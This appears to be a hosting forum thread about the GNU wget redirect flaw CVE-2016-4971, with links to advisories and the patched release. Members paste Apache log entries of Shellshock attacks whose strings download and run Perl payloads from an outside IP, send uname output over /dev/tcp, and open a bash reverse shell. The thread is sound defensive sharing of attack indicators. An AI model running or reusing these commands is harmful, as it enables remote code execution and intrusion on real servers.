A few days ago a wget vulnerability was out and all admins should update it
"GNU wget flaw leads to RCE"
Golunski explains in an advisory that a malicious actor could trick a wget file download process into executing code on someone's Linux machine.
"The vulnerability could potentially [be] abused by attackers to upload arbitrary files and achieve code execution," Dawid Golunski told Softpedia in an email.
GNU wget, which is a Linux command-line utility for silently downloading content, has support for URL redirections, in case a link has changed across time.
"GNU wget doesn't rename files when redirected to FTP links"
Golunski discovered that wget doesn't properly handle file names when redirected from an initial HTTP URL to an FTP link.
For example, an attacker in control of a server from where files are regularly downloaded via wget can use 302 redirects on their files. A user running the "wget http://attackers-server/safe_file.txt" command would be redirected to download "ftp://attackers-server/.bash_profile" instead.
In normal HTTP to HTTP redirects, GNU wget will rename the second file with the name of the original file (.bash_profile to safe_file.txt) in order to prevent RCE (Remote Code Execution). For HTTP to FTP links, wget doesn't include this safety mechanism. This issue affects all GNU wget versions prior to the patched 1.18 version.
Since wget commands are used regularly in scripts that most of the time execute the downloaded file automatically, this opens the door for a new wave of possible attacks. Cronjobs where wget is the preferred method of downloading content should be reviewed by all sysadmins.
CVE Info: https://cve.mitre.org/cgi-bin/cvename.c ... -2016-4971
Server performance optimizations Server security optimizations Database performance optimizations High Availability Proxy MariaDB
Php-Fpm multiple pools
UK OpenCart Hosting | OpenCart Audits | OpenCart Support - please email info@antropy.co.uk
Perhaps something to consider for future releases of OC ..."wget", "curl", "libcurl",.. (Wget and cURL are sometimes used for basic scraping)
Also - an attack vector prevention solution has been provided here as a structured example: http://security.stackexchange.com/quest ... /7095#7095
Dedication and passion goes to those who are able to push and merge a project.
Regards,
Straightlight
Programmer / Opencart Tester
Code: Select all
http://31.220.3.180/mox
This is what it looks like in general error log (/var/log/error_log)
Code: Select all
/usr/local/apache/logs/error_log:[Wed Mar 16 10:57:34 2016] [error] [client 31.220.3.180] File does not exist: /usr/local/apache/htdocs/hello
/usr/local/apache/logs/error_log:[Fri May 27 08:09:12 2016] [error] [client 31.220.3.180] File does not exist: /usr/local/apache/htdocs/bashh
But if you look at domlogs, you see what is actually going on (/usr/local/apache/domlogs/*)
Code: Select all
/usr/local/apache/domlogs/123.123.123.123:31.220.3.180 - - [16/Mar/2016:10:57:33 -0400] "GET /hello HTTP/1.0" 404 1987 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://31.220.3.180/g.pl;curl -O http://31.220.3.180/g.pl;wget http://31.220.3.180/g.pl;perl /tmp/g.pl*;perl g.pl;rm -rf /tmp/g.pl*\""
/usr/local/apache/domlogs/123.123.123.123:31.220.3.180 - - [27/May/2016:08:09:12 -0400] "GET /bashh HTTP/1.0" 404 1984 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://31.220.3.180/mox;curl -O http://31.220.3.180/mox;wget http://31.220.3.180/mox;perl /tmp/mox*;perl mox;rm -rf /tmp/mox*\""
Watch out for these too, trying to dirtbag up dev/tcp via referrer inject, prob so they can pull stuff similar to mentioned above:
Code: Select all
[client 192.228.107.101] suexec policy violation: see suexec log for more details, referer: () { :;}; /bin/bash -c "echo EXAMPLE.COM/cgi-bin/test-cgi > /dev/tcp/192.228.107.101/23; /bin/uname -a > /dev/tcp/192.228.107.101/23"
[client 74.208.111.148] suexec policy violation: see suexec log for more details, referer: () { :;}; /bin/bash -c "echo EXAMPLE.COM/cgi-bin/test-cgi > /dev/tcp/213.233.161.42/23; echo EXAMPLE.COM/cgi-bin/test-cgi > /dev/udp/213.233.161.42/80"
[client 91.109.2.132] suexec policy violation: see suexec log for more details, referer: () { :;}; /bin/bash -c "echo 123.123.123.123/cgi-bin/test-cgi > /dev/tcp/213.233.161.42/23; echo 123.123.123.123/cgi-bin/test-cgi > /dev/udp/213.233.161.42/80"
[client 91.109.2.132] suexec policy violation: see suexec log for more details, referer: () { :;}; /bin/bash -c "echo example.com/cgi-bin/test-cgi > /dev/tcp/213.233.161.42/23; echo example.com/cgi-bin/test-cgi > /dev/udp/213.233.161.42/80"
[client 91.109.2.132] suexec policy violation: see suexec log for more details, referer: () { :;}; /bin/bash -c "echo www.example.com/cgi-bin/test-cgi > /dev/tcp/213.233.161.42/23; echo www.example.com/cgi-bin/test-cgi > /dev/udp/213.233.161.42/80"
[client 91.109.2.132] suexec policy violation: see suexec log for more details, referer: () { :;}; /bin/bash -c "echo www.media.example.com/cgi-bin/test-cgi > /dev/tcp/213.233.161.42/23; echo www.media.example.com/cgi-bin/test-cgi > /dev/udp/213.233.161.42/80"
[client 5.255.82.41] suexec policy violation: see suexec log for more details, referer: () { :;}; /bin/bash -c "echo example.com/cgi-bin/test-cgi > /dev/tcp/213.233.161.42/23; echo example.com/cgi-bin/test-cgi > /dev/udp/213.233.161.42/80
---- RAW ----
98.126.212.154 - - [25/Apr/2016:18:38:02 -0600] "GET /cgi-bin/test-cgi HTTP/1.0" 404 1806 "-" "() { :; }; /bin/bash -i >& /dev/tcp/98.126.212.154/16161 0<&1 2>&1 &"
Suexe blocked it, but you also need some kind of user account jail/cage so that they cant file/perm traverse. CageFS works pretty good IMO
https://creadev.org | support@creadev.org - Opencart Extensions, Integrations, & Development. Made in the USA.
More information on the subject can be found on this page: https://security-tracker.debian.org/tra ... -2016-4971
GNU wget before 1.18 allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource.
Dedication and passion goes to those who are able to push and merge a project.
Regards,
Straightlight
Programmer / Opencart Tester
This is a VPS, prob should report it to the host indeed I dont understand why Redhat is in "will not fix" and "deferred" state. Its already backported in mint 18 (Ubuntu 16.04) at wget 1.17.1
Here is the 1.18 if anyone needs it http://ftp.gnu.org/gnu/wget/wget-1.18.tar.gz
https://creadev.org | support@creadev.org - Opencart Extensions, Integrations, & Development. Made in the USA.
Dedication and passion goes to those who are able to push and merge a project.
Regards,
Straightlight
Programmer / Opencart Tester
Pounding on the IP itself kinda makes sense since in multi-tenant servers with cPanel, the default webpage lives in /usr/local/cpanel/cgi-sys which is out of OP scope, recursive owned by root:wheel. If they can get it to exec, it may act similar to how they are injecting on root [or user shelled] wget crons and stuff.
https://creadev.org | support@creadev.org - Opencart Extensions, Integrations, & Development. Made in the USA.
Users browsing this forum: No registered users and 44 guests